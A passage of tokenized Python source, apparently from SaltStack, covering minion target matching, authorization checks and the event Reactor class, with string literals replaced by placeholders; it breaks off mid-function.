opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> mlist . append ( fn_ ) <EOL> return mlist <EOL> elif cache_enabled : <EOL> return os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) ) <EOL> else : <EOL> return list ( ) <EOL> def _check_compound_pillar_exact_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . 
_check_compound_minions ( expr , <EOL> delimiter , <EOL> greedy , <EOL> pillar_exact = True ) <EOL> def _check_compound_minions ( self , <EOL> expr , <EOL> delimiter , <EOL> greedy , <EOL> pillar_exact = False ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( expr , delimiter , greedy , pillar_exact ) ) <EOL> if not isinstance ( expr , six . string_types ) and not isinstance ( expr , ( list , tuple ) ) : <EOL> log . error ( '<STR_LIT>' ) <EOL> return [ ] <EOL> mlist = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> mlist . append ( fn_ ) <EOL> minions = set ( mlist ) <EOL> log . debug ( '<STR_LIT>' . format ( minions ) ) <EOL> if self . opts . get ( '<STR_LIT>' , False ) : <EOL> ref = { '<STR_LIT>' : self . _check_grain_minions , <EOL> '<STR_LIT:P>' : self . _check_grain_pcre_minions , <EOL> '<STR_LIT:I>' : self . _check_pillar_minions , <EOL> '<STR_LIT>' : self . _check_pillar_pcre_minions , <EOL> '<STR_LIT:L>' : self . _check_list_minions , <EOL> '<STR_LIT:N>' : None , <EOL> '<STR_LIT:S>' : self . _check_ipcidr_minions , <EOL> '<STR_LIT:E>' : self . _check_pcre_minions , <EOL> '<STR_LIT:R>' : self . _all_minions } <EOL> if pillar_exact : <EOL> ref [ '<STR_LIT:I>' ] = self . _check_pillar_exact_minions <EOL> ref [ '<STR_LIT>' ] = self . _check_pillar_exact_minions <EOL> results = [ ] <EOL> unmatched = [ ] <EOL> opers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:(>' , '<STR_LIT:)>' ] <EOL> if isinstance ( expr , six . string_types ) : <EOL> words = expr . 
split ( ) <EOL> else : <EOL> words = expr <EOL> for word in words : <EOL> target_info = parse_target ( word ) <EOL> if word in opers : <EOL> if results : <EOL> if results [ - <NUM_LIT:1> ] == '<STR_LIT:(>' and word in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> log . error ( '<STR_LIT>' . format ( word ) ) <EOL> return [ ] <EOL> if word == '<STR_LIT>' : <EOL> if not results [ - <NUM_LIT:1> ] in ( '<STR_LIT:&>' , '<STR_LIT:|>' , '<STR_LIT:(>' ) : <EOL> results . append ( '<STR_LIT:&>' ) <EOL> results . append ( '<STR_LIT:(>' ) <EOL> results . append ( str ( set ( minions ) ) ) <EOL> results . append ( '<STR_LIT:->' ) <EOL> unmatched . append ( '<STR_LIT:->' ) <EOL> elif word == '<STR_LIT>' : <EOL> results . append ( '<STR_LIT:&>' ) <EOL> elif word == '<STR_LIT>' : <EOL> results . append ( '<STR_LIT:|>' ) <EOL> elif word == '<STR_LIT:(>' : <EOL> results . append ( word ) <EOL> unmatched . append ( word ) <EOL> elif word == '<STR_LIT:)>' : <EOL> if not unmatched or unmatched [ - <NUM_LIT:1> ] != '<STR_LIT:(>' : <EOL> log . error ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( expr ) ) <EOL> return [ ] <EOL> results . append ( word ) <EOL> unmatched . pop ( ) <EOL> if unmatched and unmatched [ - <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> results . append ( '<STR_LIT:)>' ) <EOL> unmatched . pop ( ) <EOL> else : <EOL> log . error ( '<STR_LIT>' <EOL> . format ( expr ) ) <EOL> return [ ] <EOL> else : <EOL> if word == '<STR_LIT>' : <EOL> results . append ( '<STR_LIT:(>' ) <EOL> results . append ( str ( set ( minions ) ) ) <EOL> results . append ( '<STR_LIT:->' ) <EOL> unmatched . append ( '<STR_LIT:->' ) <EOL> elif word == '<STR_LIT:(>' : <EOL> results . append ( word ) <EOL> unmatched . append ( word ) <EOL> else : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( word ) <EOL> ) <EOL> return [ ] <EOL> elif target_info and target_info [ '<STR_LIT>' ] : <EOL> if '<STR_LIT:N>' == target_info [ '<STR_LIT>' ] : <EOL> log . error ( '<STR_LIT>' . 
format ( word ) ) <EOL> return [ ] <EOL> engine = ref . get ( target_info [ '<STR_LIT>' ] ) <EOL> if not engine : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> target_info [ '<STR_LIT>' ] , <EOL> word , <EOL> ) <EOL> ) <EOL> return [ ] <EOL> engine_args = [ target_info [ '<STR_LIT>' ] ] <EOL> if target_info [ '<STR_LIT>' ] in ( '<STR_LIT>' , '<STR_LIT:P>' , '<STR_LIT:I>' , '<STR_LIT>' ) : <EOL> engine_args . append ( target_info [ '<STR_LIT>' ] or '<STR_LIT::>' ) <EOL> engine_args . append ( True ) <EOL> results . append ( str ( set ( engine ( * engine_args ) ) ) ) <EOL> if unmatched and unmatched [ - <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> results . append ( '<STR_LIT:)>' ) <EOL> unmatched . pop ( ) <EOL> else : <EOL> results . append ( str ( set ( self . _check_glob_minions ( word , True ) ) ) ) <EOL> if unmatched and unmatched [ - <NUM_LIT:1> ] == '<STR_LIT:->' : <EOL> results . append ( '<STR_LIT:)>' ) <EOL> unmatched . pop ( ) <EOL> results . extend ( [ '<STR_LIT:)>' for item in unmatched ] ) <EOL> results = '<STR_LIT:U+0020>' . join ( results ) <EOL> log . debug ( '<STR_LIT>' <EOL> . format ( results ) ) <EOL> try : <EOL> return list ( eval ( results ) ) <EOL> except Exception : <EOL> log . error ( '<STR_LIT>' . format ( expr ) ) <EOL> return [ ] <EOL> return list ( minions ) <EOL> def connected_ids ( self , subset = None , show_ipv4 = False , include_localhost = False ) : <EOL> '''<STR_LIT>''' <EOL> minions = set ( ) <EOL> if self . opts . get ( '<STR_LIT>' , False ) : <EOL> cdir = os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if not os . path . isdir ( cdir ) : <EOL> return minions <EOL> addrs = salt . utils . network . local_port_tcp ( int ( self . opts [ '<STR_LIT>' ] ) ) <EOL> if '<STR_LIT:127.0.0.1>' in addrs or '<STR_LIT>' in addrs : <EOL> addrs . discard ( '<STR_LIT:127.0.0.1>' ) <EOL> addrs . discard ( '<STR_LIT>' ) <EOL> addrs . update ( set ( salt . utils . network . 
ip_addrs ( ) ) ) <EOL> if subset : <EOL> search = subset <EOL> else : <EOL> search = os . listdir ( cdir ) <EOL> for id_ in search : <EOL> datap = os . path . join ( cdir , id_ , '<STR_LIT>' ) <EOL> try : <EOL> with salt . utils . fopen ( datap , '<STR_LIT:rb>' ) as fp_ : <EOL> grains = self . serial . load ( fp_ ) . get ( '<STR_LIT>' , { } ) <EOL> except ( AttributeError , IOError , OSError ) : <EOL> continue <EOL> for ipv4 in grains . get ( '<STR_LIT>' , [ ] ) : <EOL> if ipv4 == '<STR_LIT:127.0.0.1>' and not include_localhost : <EOL> continue <EOL> if ipv4 == '<STR_LIT>' : <EOL> continue <EOL> if ipv4 in addrs : <EOL> if show_ipv4 : <EOL> minions . add ( ( id_ , ipv4 ) ) <EOL> else : <EOL> minions . add ( id_ ) <EOL> break <EOL> return minions <EOL> def _all_minions ( self , expr = None ) : <EOL> '''<STR_LIT>''' <EOL> mlist = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> mlist . append ( fn_ ) <EOL> return mlist <EOL> def check_minions ( self , <EOL> expr , <EOL> expr_form = '<STR_LIT>' , <EOL> delimiter = DEFAULT_TARGET_DELIM , <EOL> greedy = True ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> check_func = getattr ( self , '<STR_LIT>' . format ( expr_form ) , None ) <EOL> if expr_form in ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> minions = check_func ( expr , delimiter , greedy ) <EOL> else : <EOL> minions = check_func ( expr , greedy ) <EOL> except Exception : <EOL> log . exception ( <EOL> '<STR_LIT>' <EOL> . 
format ( expr_form , expr ) ) <EOL> minions = [ ] <EOL> return minions <EOL> def _expand_matching ( self , auth_entry ) : <EOL> ref = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:P>' : '<STR_LIT>' , <EOL> '<STR_LIT:I>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:L>' : '<STR_LIT:list>' , <EOL> '<STR_LIT:S>' : '<STR_LIT>' , <EOL> '<STR_LIT:E>' : '<STR_LIT>' , <EOL> '<STR_LIT:N>' : '<STR_LIT>' , <EOL> None : '<STR_LIT>' } <EOL> target_info = parse_target ( auth_entry ) <EOL> if not target_info : <EOL> log . error ( '<STR_LIT>' . format ( auth_entry ) ) <EOL> v_matcher = ref . get ( target_info [ '<STR_LIT>' ] ) <EOL> v_expr = target_info [ '<STR_LIT>' ] <EOL> return set ( self . check_minions ( v_expr , v_matcher ) ) <EOL> def validate_tgt ( self , valid , expr , expr_form ) : <EOL> '''<STR_LIT>''' <EOL> v_minions = self . _expand_matching ( valid ) <EOL> minions = set ( self . check_minions ( expr , expr_form ) ) <EOL> d_bool = not bool ( minions . difference ( v_minions ) ) <EOL> if len ( v_minions ) == len ( minions ) and d_bool : <EOL> return True <EOL> return d_bool <EOL> def match_check ( self , regex , fun ) : <EOL> '''<STR_LIT>''' <EOL> vals = [ ] <EOL> if isinstance ( fun , str ) : <EOL> fun = [ fun ] <EOL> for func in fun : <EOL> try : <EOL> if re . match ( regex , func ) : <EOL> vals . append ( True ) <EOL> else : <EOL> vals . append ( False ) <EOL> except Exception : <EOL> log . error ( '<STR_LIT>' . format ( regex ) ) <EOL> return vals and all ( vals ) <EOL> def any_auth ( self , form , auth_list , fun , arg , tgt = None , tgt_type = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if form == '<STR_LIT>' : <EOL> return self . auth_check ( <EOL> auth_list , <EOL> fun , <EOL> arg , <EOL> tgt , <EOL> tgt_type ) <EOL> return self . 
spec_check ( <EOL> auth_list , <EOL> fun , <EOL> form ) <EOL> def auth_check_expanded ( self , <EOL> auth_list , <EOL> funs , <EOL> args , <EOL> tgt , <EOL> tgt_type = '<STR_LIT>' , <EOL> groups = None , <EOL> publish_validate = False ) : <EOL> v_tgt_type = tgt_type <EOL> if tgt_type . lower ( ) in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> v_tgt_type = '<STR_LIT>' <EOL> elif tgt_type . lower ( ) == '<STR_LIT>' : <EOL> v_tgt_type = '<STR_LIT>' <EOL> v_minions = set ( self . check_minions ( tgt , v_tgt_type ) ) <EOL> minions = set ( self . check_minions ( tgt , tgt_type ) ) <EOL> mismatch = bool ( minions . difference ( v_minions ) ) <EOL> if publish_validate : <EOL> if mismatch : <EOL> return False <EOL> if not isinstance ( funs , list ) : <EOL> funs = [ funs ] <EOL> args = [ args ] <EOL> allowed_minions = set ( ) <EOL> auth_dictionary = { } <EOL> for auth_list_entry in auth_list : <EOL> if isinstance ( auth_list_entry , six . string_types ) : <EOL> for fun in funs : <EOL> if self . match_check ( auth_list_entry , fun ) : <EOL> return True <EOL> if isinstance ( auth_list_entry , dict ) : <EOL> if len ( auth_list_entry ) != <NUM_LIT:1> : <EOL> log . info ( '<STR_LIT>' . format ( auth_list_entry ) ) <EOL> continue <EOL> allowed_minions . update ( set ( auth_list_entry . keys ( ) ) ) <EOL> for key in auth_list_entry . keys ( ) : <EOL> for match in self . _expand_matching ( key ) : <EOL> if match in auth_dictionary : <EOL> auth_dictionary [ match ] . extend ( auth_list_entry [ key ] ) <EOL> else : <EOL> auth_dictionary [ match ] = auth_list_entry [ key ] <EOL> allowed_minions_from_auth_list = set ( ) <EOL> for next_entry in allowed_minions : <EOL> allowed_minions_from_auth_list . update ( self . _expand_matching ( next_entry ) ) <EOL> if len ( minions - allowed_minions_from_auth_list ) > <NUM_LIT:0> : <EOL> return False <EOL> try : <EOL> for minion in minions : <EOL> results = [ ] <EOL> for num , fun in enumerate ( auth_dictionary [ minion ] ) : <EOL> results . 
append ( self . match_check ( fun , funs ) ) <EOL> if not any ( results ) : <EOL> return False <EOL> return True <EOL> except TypeError : <EOL> return False <EOL> return False <EOL> def auth_check ( self , <EOL> auth_list , <EOL> funs , <EOL> args , <EOL> tgt , <EOL> tgt_type = '<STR_LIT>' , <EOL> groups = None , <EOL> publish_validate = False ) : <EOL> '''<STR_LIT>''' <EOL> if self . opts . get ( '<STR_LIT>' , False ) : <EOL> return self . auth_check_expanded ( auth_list , funs , args , tgt , tgt_type , groups , publish_validate ) <EOL> if publish_validate : <EOL> v_tgt_type = tgt_type <EOL> if tgt_type . lower ( ) in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> v_tgt_type = '<STR_LIT>' <EOL> elif tgt_type . lower ( ) == '<STR_LIT>' : <EOL> v_tgt_type = '<STR_LIT>' <EOL> v_minions = set ( self . check_minions ( tgt , v_tgt_type ) ) <EOL> minions = set ( self . check_minions ( tgt , tgt_type ) ) <EOL> mismatch = bool ( minions . difference ( v_minions ) ) <EOL> if mismatch : <EOL> return False <EOL> if not isinstance ( funs , list ) : <EOL> funs = [ funs ] <EOL> args = [ args ] <EOL> try : <EOL> for num , fun in enumerate ( funs ) : <EOL> for ind in auth_list : <EOL> if isinstance ( ind , six . string_types ) : <EOL> if self . match_check ( ind , fun ) : <EOL> return True <EOL> elif isinstance ( ind , dict ) : <EOL> if len ( ind ) != <NUM_LIT:1> : <EOL> continue <EOL> valid = next ( six . iterkeys ( ind ) ) <EOL> if self . validate_tgt ( <EOL> valid , <EOL> tgt , <EOL> tgt_type ) : <EOL> if isinstance ( ind [ valid ] , six . string_types ) : <EOL> if self . match_check ( ind [ valid ] , fun ) : <EOL> return True <EOL> elif isinstance ( ind [ valid ] , list ) : <EOL> for cond in ind [ valid ] : <EOL> if isinstance ( cond , six . string_types ) : <EOL> if self . match_check ( cond , fun ) : <EOL> return True <EOL> elif isinstance ( cond , dict ) : <EOL> if len ( cond ) != <NUM_LIT:1> : <EOL> continue <EOL> fcond = next ( six . iterkeys ( cond ) ) <EOL> if self . 
match_check ( fcond , <EOL> fun ) : <EOL> acond = cond [ fcond ] <EOL> if not isinstance ( acond , dict ) : <EOL> continue <EOL> arg_list = args [ num ] <EOL> cond_args = acond . get ( '<STR_LIT:args>' , [ ] ) <EOL> good = True <EOL> for i , cond_arg in enumerate ( cond_args ) : <EOL> if len ( arg_list ) <= i : <EOL> good = False <EOL> break <EOL> if cond_arg is None : <EOL> continue <EOL> if not self . match_check ( cond_arg , <EOL> arg_list [ i ] ) : <EOL> good = False <EOL> break <EOL> if not good : <EOL> continue <EOL> cond_kwargs = acond . get ( '<STR_LIT>' , { } ) <EOL> arg_kwargs = { } <EOL> for a in arg_list : <EOL> if isinstance ( a , <EOL> dict ) and '<STR_LIT>' in a : <EOL> arg_kwargs = a <EOL> break <EOL> for k , v in six . iteritems ( cond_kwargs ) : <EOL> if k not in arg_kwargs : <EOL> good = False <EOL> break <EOL> if v is None : <EOL> continue <EOL> if not self . match_check ( v , <EOL> arg_kwargs [ k ] ) : <EOL> good = False <EOL> break <EOL> if good : <EOL> return True <EOL> except TypeError : <EOL> return False <EOL> return False <EOL> def fill_auth_list_from_groups ( self , auth_provider , user_groups , auth_list ) : <EOL> '''<STR_LIT>''' <EOL> group_names = [ item for item in auth_provider if item . endswith ( '<STR_LIT:%>' ) ] <EOL> if group_names : <EOL> for group_name in group_names : <EOL> if group_name . rstrip ( "<STR_LIT:%>" ) in user_groups : <EOL> for matcher in auth_provider [ group_name ] : <EOL> auth_list . append ( matcher ) <EOL> return auth_list <EOL> def fill_auth_list_from_ou ( self , auth_list , opts = None ) : <EOL> '''<STR_LIT>''' <EOL> ou_names = [ ] <EOL> for item in auth_list : <EOL> if isinstance ( item , six . string_types ) : <EOL> continue <EOL> ou_names . append ( [ potential_ou for potential_ou in item . keys ( ) if potential_ou . startswith ( '<STR_LIT>' ) ] ) <EOL> if ou_names : <EOL> auth_list = salt . auth . ldap . 
expand_ldap_entries ( auth_list , opts ) <EOL> return auth_list <EOL> def wheel_check ( self , auth_list , fun ) : <EOL> '''<STR_LIT>''' <EOL> comps = fun . split ( '<STR_LIT:.>' ) <EOL> if len ( comps ) != <NUM_LIT:2> : <EOL> return False <EOL> mod = comps [ <NUM_LIT:0> ] <EOL> fun = comps [ <NUM_LIT:1> ] <EOL> for ind in auth_list : <EOL> if isinstance ( ind , six . string_types ) : <EOL> if ind . startswith ( '<STR_LIT:@>' ) and ind [ <NUM_LIT:1> : ] == mod : <EOL> return True <EOL> if ind == '<STR_LIT>' : <EOL> return True <EOL> if ind == '<STR_LIT>' : <EOL> return True <EOL> elif isinstance ( ind , dict ) : <EOL> if len ( ind ) != <NUM_LIT:1> : <EOL> continue <EOL> valid = next ( six . iterkeys ( ind ) ) <EOL> if valid . startswith ( '<STR_LIT:@>' ) and valid [ <NUM_LIT:1> : ] == mod : <EOL> if isinstance ( ind [ valid ] , six . string_types ) : <EOL> if self . match_check ( ind [ valid ] , fun ) : <EOL> return True <EOL> elif isinstance ( ind [ valid ] , list ) : <EOL> for regex in ind [ valid ] : <EOL> if self . match_check ( regex , fun ) : <EOL> return True <EOL> return False <EOL> def runner_check ( self , auth_list , fun ) : <EOL> '''<STR_LIT>''' <EOL> comps = fun . split ( '<STR_LIT:.>' ) <EOL> if len ( comps ) != <NUM_LIT:2> : <EOL> return False <EOL> mod = comps [ <NUM_LIT:0> ] <EOL> fun = comps [ <NUM_LIT:1> ] <EOL> for ind in auth_list : <EOL> if isinstance ( ind , six . string_types ) : <EOL> if ind . startswith ( '<STR_LIT:@>' ) and ind [ <NUM_LIT:1> : ] == mod : <EOL> return True <EOL> if ind == '<STR_LIT>' : <EOL> return True <EOL> if ind == '<STR_LIT>' : <EOL> return True <EOL> elif isinstance ( ind , dict ) : <EOL> if len ( ind ) != <NUM_LIT:1> : <EOL> continue <EOL> valid = next ( six . iterkeys ( ind ) ) <EOL> if valid . startswith ( '<STR_LIT:@>' ) and valid [ <NUM_LIT:1> : ] == mod : <EOL> if isinstance ( ind [ valid ] , six . string_types ) : <EOL> if self . 
match_check ( ind [ valid ] , fun ) : <EOL> return True <EOL> elif isinstance ( ind [ valid ] , list ) : <EOL> for regex in ind [ valid ] : <EOL> if self . match_check ( regex , fun ) : <EOL> return True <EOL> return False <EOL> def spec_check ( self , auth_list , fun , form ) : <EOL> '''<STR_LIT>''' <EOL> if form != '<STR_LIT>' : <EOL> comps = fun . split ( '<STR_LIT:.>' ) <EOL> if len ( comps ) != <NUM_LIT:2> : <EOL> return False <EOL> mod = comps [ <NUM_LIT:0> ] <EOL> fun = comps [ <NUM_LIT:1> ] <EOL> else : <EOL> mod = fun <EOL> for ind in auth_list : <EOL> if isinstance ( ind , six . string_types ) : <EOL> if ind . startswith ( '<STR_LIT:@>' ) and ind [ <NUM_LIT:1> : ] == mod : <EOL> return True <EOL> if ind == '<STR_LIT>' . format ( form ) : <EOL> return True <EOL> if ind == '<STR_LIT>' . format ( form ) : <EOL> return True <EOL> elif isinstance ( ind , dict ) : <EOL> if len ( ind ) != <NUM_LIT:1> : <EOL> continue <EOL> valid = next ( six . iterkeys ( ind ) ) <EOL> if valid . startswith ( '<STR_LIT:@>' ) and valid [ <NUM_LIT:1> : ] == mod : <EOL> if isinstance ( ind [ valid ] , six . string_types ) : <EOL> if self . match_check ( ind [ valid ] , fun ) : <EOL> return True <EOL> elif isinstance ( ind [ valid ] , list ) : <EOL> for regex in ind [ valid ] : <EOL> if self . match_check ( regex , fun ) : <EOL> return True <EOL> return False <EOL> def mine_get ( tgt , fun , tgt_type = '<STR_LIT>' , opts = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> serial = salt . payload . Serial ( opts ) <EOL> checker = salt . utils . minions . CkMinions ( opts ) <EOL> minions = checker . check_minions ( <EOL> tgt , <EOL> tgt_type ) <EOL> for minion in minions : <EOL> mine = os . path . join ( <EOL> opts [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , <EOL> minion , <EOL> '<STR_LIT>' ) <EOL> try : <EOL> with salt . utils . fopen ( mine , '<STR_LIT:rb>' ) as fp_ : <EOL> fdata = serial . load ( fp_ ) . 
get ( fun ) <EOL> if fdata : <EOL> ret [ minion ] = fdata <EOL> except Exception : <EOL> continue <EOL> return ret </s>
<s> from __future__ import absolute_import <EOL> import fnmatch <EOL> import glob <EOL> import logging <EOL> import yaml <EOL> import salt . runner <EOL> import salt . state <EOL> import salt . utils <EOL> import salt . utils . cache <EOL> import salt . utils . event <EOL> import salt . utils . process <EOL> import salt . defaults . exitcodes <EOL> from salt . ext . six import string_types , iterkeys <EOL> from salt . _compat import string_types <EOL> log = logging . getLogger ( __name__ ) <EOL> class Reactor ( salt . utils . process . SignalHandlingMultiprocessingProcess , salt . state . Compiler ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , opts , log_queue = None ) : <EOL> super ( Reactor , self ) . __init__ ( log_queue = log_queue ) <EOL> local_minion_opts = opts . copy ( ) <EOL> local_minion_opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . minion = salt . minion . MasterMinion ( local_minion_opts ) <EOL> salt . state . Compiler . __init__ ( self , opts , self . minion . rend ) <EOL> def __setstate__ ( self , state ) : <EOL> self . _is_child = True <EOL> Reactor . __init__ ( <EOL> self , state [ '<STR_LIT>' ] , <EOL> log_queue = state [ '<STR_LIT>' ] ) <EOL> def __getstate__ ( self ) : <EOL> return { '<STR_LIT>' : self . opts , <EOL> '<STR_LIT>' : self . log_queue } <EOL> def render_reaction ( self , glob_ref , tag , data ) : <EOL> '''<STR_LIT>''' <EOL> react = { } <EOL> if glob_ref . startswith ( '<STR_LIT>' ) : <EOL> glob_ref = self . minion . functions [ '<STR_LIT>' ] ( glob_ref ) <EOL> for fn_ in glob . glob ( glob_ref ) : <EOL> try : <EOL> res = self . render_template ( <EOL> fn_ , <EOL> tag = tag , <EOL> data = data ) <EOL> for name in res : <EOL> res [ name ] [ '<STR_LIT>' ] = fn_ <EOL> react . update ( res ) <EOL> except Exception : <EOL> log . error ( '<STR_LIT>' . format ( fn_ ) , exc_info = True ) <EOL> return react <EOL> def list_reactors ( self , tag ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . 
format ( tag ) ) <EOL> reactors = [ ] <EOL> if isinstance ( self . opts [ '<STR_LIT>' ] , string_types ) : <EOL> try : <EOL> with salt . utils . fopen ( self . opts [ '<STR_LIT>' ] ) as fp_ : <EOL> react_map = yaml . safe_load ( fp_ . read ( ) ) <EOL> except ( OSError , IOError ) : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( <EOL> self . opts [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> except Exception : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( <EOL> self . opts [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> else : <EOL> react_map = self . opts [ '<STR_LIT>' ] <EOL> for ropt in react_map : <EOL> if not isinstance ( ropt , dict ) : <EOL> continue <EOL> if len ( ropt ) != <NUM_LIT:1> : <EOL> continue <EOL> key = next ( iterkeys ( ropt ) ) <EOL> val = ropt [ key ] <EOL> if fnmatch . fnmatch ( tag , key ) : <EOL> if isinstance ( val , string_types ) : <EOL> reactors . append ( val ) <EOL> elif isinstance ( val , list ) : <EOL> reactors . extend ( val ) <EOL> return reactors <EOL> def list_all ( self ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( self . minion . opts [ '<STR_LIT>' ] , string_types ) : <EOL> log . debug ( '<STR_LIT>' . format ( self . opts [ '<STR_LIT>' ] ) ) <EOL> try : <EOL> with salt . utils . fopen ( self . opts [ '<STR_LIT>' ] ) as fp_ : <EOL> react_map = yaml . safe_load ( fp_ . read ( ) ) <EOL> except ( OSError , IOError ) : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( <EOL> self . opts [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> except Exception : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( <EOL> self . opts [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' ) <EOL> react_map = self . minion . opts [ '<STR_LIT>' ] <EOL> return react_map <EOL> def add_reactor ( self , tag , reaction ) : <EOL> '''<STR_LIT>''' <EOL> reactors = self . 
list_all ( ) <EOL> for reactor in reactors : <EOL> _tag = next ( iterkeys ( reactor ) ) <EOL> if _tag == tag : <EOL> return { '<STR_LIT:status>' : False , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . minion . opts [ '<STR_LIT>' ] . append ( { tag : reaction } ) <EOL> return { '<STR_LIT:status>' : True , '<STR_LIT>' : '<STR_LIT>' } <EOL> def delete_reactor ( self , tag ) : <EOL> '''<STR_LIT>''' <EOL> reactors = self . list_all ( ) <EOL> for reactor in reactors : <EOL> _tag = next ( iterkeys ( reactor ) ) <EOL> if _tag == tag : <EOL> self . minion . opts [ '<STR_LIT>' ] . remove ( reactor ) <EOL> return { '<STR_LIT:status>' : True , '<STR_LIT>' : '<STR_LIT>' } <EOL> return { '<STR_LIT:status>' : False , '<STR_LIT>' : '<STR_LIT>' } <EOL> def reactions ( self , tag , data , reactors ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( tag ) ) <EOL> high = { } <EOL> chunks = [ ] <EOL> try : <EOL> for fn_ in reactors : <EOL> high . update ( self . render_reaction ( fn_ , tag , data ) ) <EOL> if high : <EOL> errors = self . verify_high ( high ) <EOL> if errors : <EOL> log . error ( ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( tag , errors , reactors ) ) <EOL> return [ ] <EOL> chunks = self . order_chunks ( self . compile_high_data ( high ) ) <EOL> except Exception as exc : <EOL> log . error ( '<STR_LIT>' . format ( exc ) , exc_info = True ) <EOL> return chunks <EOL> def call_reactions ( self , chunks ) : <EOL> '''<STR_LIT>''' <EOL> for chunk in chunks : <EOL> self . wrap . run ( chunk ) <EOL> def run ( self ) : <EOL> '''<STR_LIT>''' <EOL> salt . utils . appendproctitle ( self . __class__ . __name__ ) <EOL> self . event = salt . utils . event . get_event ( <EOL> self . opts [ '<STR_LIT>' ] , <EOL> self . opts [ '<STR_LIT>' ] , <EOL> self . opts [ '<STR_LIT>' ] , <EOL> opts = self . opts , <EOL> listen = True ) <EOL> self . wrap = ReactWrap ( self . opts ) <EOL> for data in self . event . iter_events ( full = True ) : <EOL> if data [ '<STR_LIT:data>' ] . 
get ( '<STR_LIT:user>' ) == self . wrap . event_user : <EOL> continue <EOL> if data [ '<STR_LIT>' ] . endswith ( '<STR_LIT>' ) : <EOL> _data = data [ '<STR_LIT:data>' ] <EOL> res = self . add_reactor ( _data [ '<STR_LIT>' ] , _data [ '<STR_LIT>' ] ) <EOL> self . event . fire_event ( { '<STR_LIT>' : self . list_all ( ) , <EOL> '<STR_LIT:result>' : res } , <EOL> '<STR_LIT>' ) <EOL> elif data [ '<STR_LIT>' ] . endswith ( '<STR_LIT>' ) : <EOL> _data = data [ '<STR_LIT:data>' ] <EOL> res = self . delete_reactor ( _data [ '<STR_LIT>' ] ) <EOL> self . event . fire_event ( { '<STR_LIT>' : self . list_all ( ) , <EOL> '<STR_LIT:result>' : res } , <EOL> '<STR_LIT>' ) <EOL> elif data [ '<STR_LIT>' ] . endswith ( '<STR_LIT>' ) : <EOL> self . event . fire_event ( { '<STR_LIT>' : self . list_all ( ) } , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> reactors = self . list_reactors ( data [ '<STR_LIT>' ] ) <EOL> if not reactors : <EOL> continue <EOL> chunks = self . reactions ( data [ '<STR_LIT>' ] , data [ '<STR_LIT:data>' ] , reactors ) <EOL> if chunks : <EOL> try : <EOL> self . call_reactions ( chunks ) <EOL> except SystemExit : <EOL> log . warning ( '<STR_LIT>' ) <EOL> class ReactWrap ( object ) : <EOL> '''<STR_LIT>''' <EOL> client_cache = None <EOL> event_user = '<STR_LIT>' <EOL> def __init__ ( self , opts ) : <EOL> self . opts = opts <EOL> if ReactWrap . client_cache is None : <EOL> ReactWrap . client_cache = salt . utils . cache . CacheDict ( opts [ '<STR_LIT>' ] ) <EOL> self . pool = salt . utils . process . ThreadPool ( <EOL> self . opts [ '<STR_LIT>' ] , <EOL> queue_size = self . opts [ '<STR_LIT>' ] <EOL> ) <EOL> def run ( self , low ) : <EOL> '''<STR_LIT>''' <EOL> l_fun = getattr ( self , low [ '<STR_LIT:state>' ] ) <EOL> try : <EOL> f_call = salt . utils . format_call ( l_fun , low ) <EOL> kwargs = f_call . get ( '<STR_LIT>' , { } ) 